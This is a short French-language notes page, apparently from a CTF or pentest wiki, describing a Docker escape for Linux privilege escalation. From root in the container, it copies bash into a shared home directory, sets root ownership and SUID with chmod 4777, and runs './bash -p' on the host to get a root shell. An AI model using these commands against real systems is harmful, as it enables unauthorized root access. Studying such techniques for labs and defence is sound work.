Docker Escape (Manipulation Permissions SUID) - Linux Privilege Escalation

Bash SUID depuis le Docker

Puisque dans le conteneur Docker, nous sommes root, nous allons copier le binaire bash depuis le host normal de la machine dans le répertoire home de augustus :

cp /bin/bash .

Depuis le root du Docker, nous allons autoriser le groupe root pour ce fichier bash et les permissions SUID afin qu'il s'exécute comme root :

chown root:root bash
chmod 4777 bash

Nous retournons sur le SSH et nous voyons :

-rwsrwxrwx 1 root root 1234376 Oct 28 11:35 bash

./bash -p

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?